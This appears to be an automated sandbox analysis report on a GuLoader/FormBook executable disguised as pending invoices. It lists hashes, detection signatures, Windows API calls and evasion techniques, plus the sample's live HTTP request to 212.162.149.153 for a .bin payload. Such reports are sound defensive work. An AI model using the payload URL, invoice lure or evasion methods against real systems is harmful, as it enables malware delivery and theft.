Windows Analysis Report
FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe

Overview

General Information

Sample name: FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe
Analysis ID: 1587320
MD5: 4f2c796aebd02a54ca9bebb0c5bc5ef0
SHA1: 558e2f3de9077aaf9159c4fb1633d66c75b14dda
SHA256: c2f619460d6cd63ca1ae9b9abec61842fa05f09c0698fc4c400ccd5342109692

Detection

FormBook, GuLoader
Score: 76
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Yara detected GuLoader
AI detected suspicious sample
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found dropped PE file which has not been started or loaded
Found evaded block containing many API calls
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000003.00000002.2382836731.0000000032150000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000000.00000002.2241540149.0000000004B8E000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security |
No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-10T07:05:27.108954+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49740 | 212.162.149.153 | 80 | TCP

      AV Detection

      Source: FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe | Virustotal: Detection: 55%
      Source: FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe | ReversingLabs: Detection: 42%
      Source: Yara match | File source: 00000003.00000002.2382836731.0000000032150000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
      Source: FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: mshtml.pdb source: FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000001.2240319361.0000000000649000.00000020.00000001.01000000.00000007.sdmp
      Source: Binary string: wntdll.pdbUGP source: FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000003.2328835292.0000000032303000.00000004.00000020.00020000.00000000.sdmp, FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmp, FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000003.2326959137.0000000032158000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: wntdll.pdb source: FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000003.2328835292.0000000032303000.00000004.00000020.00020000.00000000.sdmp, FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmp, FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000003.2326959137.0000000032158000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mshtml.pdbUGP source: FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000001.2240319361.0000000000649000.00000020.00000001.01000000.00000007.sdmp
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe | Code function: 0_2_004066F4 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_004066F4
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe | Code function: 0_2_004065AA FindFirstFileW,FindClose,0_2_004065AA
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe | Code function: 0_2_00402B75 FindFirstFileW,0_2_00402B75
      Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.5:49740 -> 212.162.149.153:80
      Source: global traffic | HTTP traffic detected:
        GET /iXjlIFhRzlkjbZPQm185.bin HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
        Host: 212.162.149.153
        Cache-Control: no-cache
      Source: unknown | TCP traffic detected without corresponding DNS query: 212.162.149.153
      Source: FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000002.2361213238.0000000002448000.00000004.00000020.00020000.00000000.sdmp, FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000002.2361213238.0000000002484000.00000004.00000020.00020000.00000000.sdmp, FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000002.2361479520.00000000025C0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://212.162.149.153/iXjlIFhRzlkjbZPQm185.bin
      Source: FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000002.2361213238.0000000002448000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://212.162.149.153/iXjlIFhRzlkjbZPQm185.binDfNN
      Source: FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000002.2361213238.0000000002484000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://212.162.149.153/iXjlIFhRzlkjbZPQm185.binT
      Source: FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000002.2361213238.0000000002484000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://212.162.149.153/iXjlIFhRzlkjbZPQm185.binY
      Source: FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000002.2361213238.0000000002484000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://212.162.149.153/iXjlIFhRzlkjbZPQm185.binm
      Source: FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe | String found in binary or memory: http://nsis.sf.net/NSIS_Error...
      Source: FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000001.2240319361.0000000000649000.00000020.00000001.01000000.00000007.sdmp | String found in binary or memory: http://www.ftp.ftp://ftp.gopher.
      Source: FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000001.2240319361.00000000005F2000.00000020.00000001.01000000.00000007.sdmp | String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
      Source: FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000001.2240319361.00000000005F2000.00000020.00000001.01000000.00000007.sdmp | String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
      Source: FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000001.2240319361.0000000000649000.00000020.00000001.01000000.00000007.sdmp | String found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe | Code function: 0_2_00404B0B GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,LdrInitializeThunk,SendMessageW,CreatePopupMenu,LdrInitializeThunk,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00404B0B

      E-Banking Fraud

      Source: Yara match | File source: 00000003.00000002.2382836731.0000000032150000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe | Code function: 3_2_325235C0 NtCreateMutant,LdrInitializeThunk,3_2_325235C0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe | Code function: 3_2_32522B60 NtClose,LdrInitializeThunk,3_2_32522B60
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe | Code function: 3_2_32522C70 NtFreeVirtualMemory,LdrInitializeThunk,3_2_32522C70
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe | Code function: 3_2_32522DF0 NtQuerySystemInformation,LdrInitializeThunk,3_2_32522DF0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe | Code function: 3_2_32523010 NtOpenDirectoryObject,3_2_32523010
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe | Code function: 3_2_32523090 NtSetValueKey,3_2_32523090
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe | Code function: 3_2_325239B0 NtGetContextThread,3_2_325239B0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe | Code function: 3_2_32523D70 NtOpenThread,3_2_32523D70
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe | Code function: 3_2_32523D10 NtOpenProcessToken,3_2_32523D10
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe | Code function: 3_2_32524340 NtSetContextThread,3_2_32524340
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe | Code function: 3_2_32524650 NtSuspendThread,3_2_32524650
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe | Code function: 3_2_32522AD0 NtReadFile,3_2_32522AD0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe | Code function: 3_2_32522AF0 NtWriteFile,3_2_32522AF0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe | Code function: 3_2_32522AB0 NtWaitForSingleObject,3_2_32522AB0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe | Code function: 3_2_32522BF0 NtAllocateVirtualMemory,3_2_32522BF0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe | Code function: 3_2_32522BE0 NtQueryValueKey,3_2_32522BE0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe | Code function: 3_2_32522B80 NtQueryInformationFile,3_2_32522B80
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe | Code function: 3_2_32522BA0 NtEnumerateValueKey,3_2_32522BA0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe | Code function: 3_2_32522E30 NtWriteVirtualMemory,3_2_32522E30
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe | Code function: 3_2_32522EE0 NtQueueApcThread,3_2_32522EE0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe | Code function: 3_2_32522E80 NtReadVirtualMemory,3_2_32522E80
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe | Code function: 3_2_32522EA0 NtAdjustPrivilegesToken,3_2_32522EA0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe | Code function: 3_2_32522F60 NtCreateProcessEx,3_2_32522F60
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe | Code function: 3_2_32522F30 NtCreateSection,3_2_32522F30
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe | Code function: 3_2_32522FE0 NtCreateFile,3_2_32522FE0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe | Code function: 3_2_32522F90 NtProtectVirtualMemory,3_2_32522F90
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe | Code function: 3_2_32522FB0 NtResumeThread,3_2_32522FB0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe | Code function: 3_2_32522FA0 NtQuerySection,3_2_32522FA0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe | Code function: 3_2_32522C60 NtCreateKey,3_2_32522C60
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe | Code function: 3_2_32522C00 NtQueryInformationProcess,3_2_32522C00
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe | Code function: 3_2_32522CC0 NtQueryVirtualMemory,3_2_32522CC0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe | Code function: 3_2_32522CF0 NtOpenProcess,3_2_32522CF0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe | Code function: 3_2_32522CA0 NtQueryInformationToken,3_2_32522CA0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe | Code function: 3_2_32522D10 NtMapViewOfSection,3_2_32522D10
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe | Code function: 3_2_32522D00 NtSetInformationFile,3_2_32522D00
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe | Code function: 3_2_32522D30 NtUnmapViewOfSection,3_2_32522D30
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe | Code function: 3_2_32522DD0 NtDelayExecution,3_2_32522DD0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe | Code function: 3_2_32522DB0 NtEnumerateKey,3_2_32522DB0
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe | Code function: 0_2_004036D7 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,0_2_004036D7
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Code function: String function: 32525130 appears 58 times
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Code function: String function: 3255EA12 appears 82 times
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Code function: String function: 3256F290 appears 103 times
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Code function: String function: 324DB970 appears 280 times
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Code function: String function: 32537E54 appears 111 times
      Source: FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Static PE information: invalid certificate
      Source: FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000000.00000000.1992613676.0000000000461000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamespaltedefinitionens evalueringsrutinernes.exeDVarFileInfo$ vs FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe
      Source: FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000002.2382945786.0000000032781000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe
      Source: FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000003.2326959137.000000003227B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe
      Source: FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000003.2328835292.0000000032430000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe
      Source: FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000000.2238615889.0000000000461000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamespaltedefinitionens evalueringsrutinernes.exeDVarFileInfo$ vs FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe
      Source: FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Binary or memory string: OriginalFilenamespaltedefinitionens evalueringsrutinernes.exeDVarFileInfo$ vs FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe
      Source: FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: classification engine Classification label: mal76.troj.evad.winEXE@3/6@0/1
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Code function: 0_2_004036D7 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx, 0_2_004036D7
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Code function: 0_2_00404060 GetDlgItem,SetWindowTextW,LdrInitializeThunk,LdrInitializeThunk,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,EnableWindow, 0_2_00404060
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Code function: 0_2_0040234F LdrInitializeThunk,CoCreateInstance,LdrInitializeThunk, 0_2_0040234F
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe File created: C:\Users\user\AppData\Local\Temp\nscBF6C.tmp
      Source: FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe File read: C:\Users\desktop.ini
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Virustotal: Detection: 55%
      Source: FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe ReversingLabs: Detection: 42%
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe File read: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe
      Source: unknown Process created: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe "C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe"
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Process created: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe "C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe"
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Process created: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe "C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe"
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Section loaded: uxtheme.dll
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Section loaded: userenv.dll
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Section loaded: apphelp.dll
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Section loaded: propsys.dll
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Section loaded: dwmapi.dll
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Section loaded: cryptbase.dll
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Section loaded: oleacc.dll
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Section loaded: ntmarta.dll
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Section loaded: version.dll
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Section loaded: shfolder.dll
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Section loaded: kernel.appcore.dll
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Section loaded: windows.storage.dll
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Section loaded: wldp.dll
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Section loaded: riched20.dll
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Section loaded: usp10.dll
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Section loaded: msls31.dll
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Section loaded: textinputframework.dll
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Section loaded: coreuicomponents.dll
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Section loaded: coremessaging.dll
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Section loaded: wintypes.dll
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Section loaded: textshaping.dll
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Section loaded: iertutil.dll
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Section loaded: sspicli.dll
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Section loaded: powrprof.dll
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Section loaded: winhttp.dll
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Section loaded: wkscli.dll
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Section loaded: netutils.dll
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Section loaded: umpdc.dll
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Section loaded: wininet.dll
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Section loaded: windows.storage.dll
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Section loaded: wldp.dll
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Section loaded: profapi.dll
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Section loaded: kernel.appcore.dll
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Section loaded: ondemandconnroutehelper.dll
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Section loaded: mswsock.dll
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Section loaded: iphlpapi.dll
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Section loaded: winnsi.dll
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Section loaded: urlmon.dll
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Section loaded: srvcli.dll
      Source: C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
      Source: FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: mshtml.pdb source: FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000001.2240319361.0000000000649000.00000020.00000001.01000000.00000007.sdmp
      Source: Binary string: wntdll.pdbUGP source: FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000003.2328835292.0000000032303000.00000004.00000020.00020000.00000000.sdmp, FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmp, FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000003.2326959137.0000000032158000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: wntdll.pdb source: FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000003.2328835292.0000000032303000.00000004.00000020.00020000.00000000.sdmp, FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmp, FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000003.2326959137.0000000032158000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mshtml.pdbUGP source: FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000001.2240319361.0000000000649000.00000020.00000001.01000000.00000007.sdmp

      Data Obfuscation

      Source: Yara match File source: 00000000.00000002.2241540149.0000000004B8E000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
